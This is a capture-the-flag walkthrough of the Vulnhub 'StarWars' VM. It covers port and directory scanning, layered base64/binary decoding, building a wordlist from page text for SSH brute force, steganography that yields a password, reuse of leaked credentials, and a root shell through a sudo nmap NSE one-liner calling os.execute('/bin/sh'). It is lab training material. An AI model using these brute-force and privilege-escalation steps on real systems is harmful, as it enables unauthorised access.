Vulnhub: StarWars

This is a beginner level VM from Vulnhub. Star-wars themed 😍

Scanning:

root@kali:~# nmap -PS 192.168.57.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-06 17:16 EDT
Nmap scan report for 192.168.57.15
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Checking out the Web Server:

Checking the page source:

Decoding from base64:

Decoding from Binary:
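The page source hides a value behind two encoding layers (base64 on the outside, an 8-bit binary string underneath), which the walkthrough decodes by hand. The script below is an added example, not the VM's content or the author's code: it builds a constructed sample with the same two layers and then peels them off automatically, in whatever order they appear, stopping once the result is neither binary nor printable base64 so that a final plaintext such as a password is not mangled by a spurious extra decode.

```python
import base64
import binascii
import re
import string
from typing import List, Optional, Tuple

# Constructed sample input (this is not the VM's real page-source comment):
# a short message written out as 8-bit binary groups and then base64-encoded,
# the same two layers the walkthrough peels off by hand.
PLAINTEXT = "hello there"
BINARY_LAYER = " ".join(format(b, "08b") for b in PLAINTEXT.encode())
SAMPLE_COMMENT = base64.b64encode(BINARY_LAYER.encode()).decode()

PRINTABLE = set(string.printable)


def is_printable(text: str) -> bool:
    """True for non-empty text made only of printable ASCII (incl. whitespace)."""
    return bool(text) and all(ch in PRINTABLE for ch in text)


def decode_binary(bits: str) -> Optional[str]:
    """Turn whitespace-separated 0/1 groups into text; None if not 8-bit binary."""
    digits = re.sub(r"\s", "", bits)
    if not digits or re.search(r"[^01]", digits) or len(digits) % 8:
        return None
    raw = bytes(int(digits[i:i + 8], 2) for i in range(0, len(digits), 8))
    text = raw.decode("utf-8", errors="replace")
    return text if is_printable(text) else None


def decode_base64(blob: str) -> Optional[str]:
    """Strictly base64-decode blob; None if it is not valid base64 or not text."""
    try:
        raw = base64.b64decode(re.sub(r"\s", "", blob), validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("utf-8", errors="replace")
    return text if is_printable(text) else None


def peel(blob: str, max_layers: int = 8) -> List[Tuple[str, str]]:
    """Strip binary and base64 layers in whatever order they appear.

    Returns [(layer_kind, decoded_text), ...]; the last entry is the plaintext.
    Stops when the current text is neither binary nor printable base64, so a
    final value like 'babyYoda123' is left alone rather than decoded to junk.
    """
    layers: List[Tuple[str, str]] = []
    current = blob
    for _ in range(max_layers):
        for kind, decoder in (("binary", decode_binary), ("base64", decode_base64)):
            decoded = decoder(current)
            if decoded is not None:
                layers.append((kind, decoded))
                current = decoded
                break
        else:
            break  # nothing decoded this round: current is the plaintext
    return layers


if __name__ == "__main__":
    for kind, text in peel(SAMPLE_COMMENT):
        print(f"[{kind}] {text}")
```

The printable check is what keeps the loop honest: short plain words are often valid base64 by accident, but they decode to non-printable bytes and are rejected.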

Web Enumeration:

root@kali:~# dirb http://192.168.57.15

GENERATED WORDS: 4612
---- Scanning URL: http://192.168.57.15/ ----
+ http://192.168.57.15/admin (CODE:200|SIZE:3753)
==> DIRECTORY: http://192.168.57.15//assets/images/
+ http://192.168.57.15/index.html (CODE:200|SIZE:548)
==> DIRECTORY: http://192.168.57.15/javascript/
==> DIRECTORY: http://192.168.57.15/manual/
+ http://192.168.57.15/robots.txt (CODE:200|SIZE:105)
+ http://192.168.57.15/server-status (CODE:403|SIZE:278)
+ http://192.168.57.15/wordpress (CODE:200|SIZE:54)

Checking wordpress:

Checking out admin:

There is nothing there; the login form does not actually submit anywhere:

Checking robots.txt:

Checking out r2d2:

Creating a wordlist from this page with cewl, since it contains several Star Wars words (tatooine, obi wan, etc.):
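cewl does this by spidering the page, keeping only visible text and counting words of a minimum length. As an added example (not the author's command or cewl itself), the script below reimplements that core step against a constructed sample page, skipping script and style bodies so JavaScript variable names do not pollute the list, ordering words by frequency, and adding a small rule-based mangling step (capitalisation and digit suffixes) that goes beyond what the walkthrough did and is included only as a common next step when a plain wordlist fails.

```python
import re
from collections import Counter
from html.parser import HTMLParser
from typing import Dict, Iterable, List

# Constructed sample page (not the VM's real r2d2 page), seeded with the kind
# of Star Wars words the walkthrough says it found there.
SAMPLE_HTML = """<html><head><title>R2D2</title>
<script>var token = "ignoreme";</script>
<style>.blue { color: blue }</style></head>
<body><h1>Welcome to Tatooine</h1>
<p>Obi Wan Kenobi trained Anakin Skywalker on Tatooine.</p>
<p>Luke Skywalker &amp; Leia. Darth Vader. Yoda says: patience.</p>
</body></html>"""


class VisibleText(HTMLParser):
    """Collect text nodes, skipping <script> and <style> bodies."""

    def __init__(self) -> None:
        super().__init__()
        self._skip = 0
        self.chunks: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def word_counts(html: str, min_length: int = 3, lowercase: bool = True) -> Dict[str, int]:
    """Count words in the visible text; Counter keeps first-appearance order."""
    parser = VisibleText()
    parser.feed(html)
    parser.close()
    text = " ".join(parser.chunks)
    words = re.findall(r"[A-Za-z][A-Za-z0-9]*", text)
    if lowercase:
        words = [w.lower() for w in words]
    return Counter(w for w in words if len(w) >= min_length)


def build_wordlist(html: str, min_length: int = 3, lowercase: bool = True) -> List[str]:
    """Most frequent words first; ties keep page order because sort is stable."""
    counts = word_counts(html, min_length, lowercase)
    return sorted(counts, key=lambda w: -counts[w])


def mangle(words: Iterable[str], suffixes=("123", "1", "!")) -> List[str]:
    """Cheap variants of each word (capitalised, digit/symbol suffixes).

    Assumption: a generic mutation step added here, not something cewl or the
    walkthrough did; it is one of the first things to try if the raw list fails.
    """
    out: List[str] = []
    for w in words:
        for base in (w, w.capitalize()):
            out.append(base)
            out.extend(base + s for s in suffixes)
    return list(dict.fromkeys(out))  # dedupe, preserving order


if __name__ == "__main__":
    wordlist = build_wordlist(SAMPLE_HTML)
    print("\n".join(wordlist))
    print("--- mangled ---")
    print("\n".join(mangle(wordlist[:3])))
```

Feed the real page into `build_wordlist` (or just use cewl) and pipe the result into hydra as the user list in one run and the password list in another; keeping the two lists separate is what makes the later "missed this" username step cheap to redo.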

Downloading the two images from /assets/images (the two Yodas seen on the home page):

You can see they are vastly different sizes, so something might be hidden in one of them.

Stego:

Running stegoveritas on yoda.png:

Result:

root​@kali​:~/Downloads/results/keepers​# cat 1599426719.9636476
the real password is babyYoda123

SSH Login:

Finding the username to go with the password:

Trying the cewl wordlist:

Using a star wars wordlist:

Login to SSH:

Oops, I missed this:

Trying the cewl wordlist with skywalker:

Privilege Escalation:

Logging in as skywalker:

This file suggests Darth must have a cronjob running:

skywalker@starwars:~$ cat .secrets/note.txt
Darth must take up the job of being a good father
skywalker@starwars:~$ id -a
uid=1001(skywalker) gid=1001(skywalker) groups=1001(skywalker),2000(anakin)

This must be the script the job runs; judging by its comment, it runs every minute.

skywalker@starwars:/home/Darth/.secrets$ cat evil.py
# Let the fear flow through you every single minute
fear = 1
anger = fear
hate = anger
suffering = hate

I looked for the job but couldn't find it.

“Cheating” at Priv Esc:

Used this to get the password for Darth (the creator of this box forgot to clear the command history). Combine these into luke12clone50 and log in as Darth.

Checking crontab:

Oops, I really messed up there.

Use nmap to get a root shell:

Darth can run nmap with sudo. Use mktemp to create a temporary file, write a one-line NSE (Lua) script into it that spawns a shell, and pass it to nmap with --script; because nmap itself runs as root under sudo, the spawned shell is root:

Darth​@starwars​:/home/skywalker​$ TF=​$(mktemp)
Darth​@starwars​:/home/skywalker​$ echo ​ 'os.execute("/bin/sh")'​ > ​ $TF
Darth​@starwars​:/home/skywalker​$ sudo nmap --script=​ $TF

Root Flag:

FIN.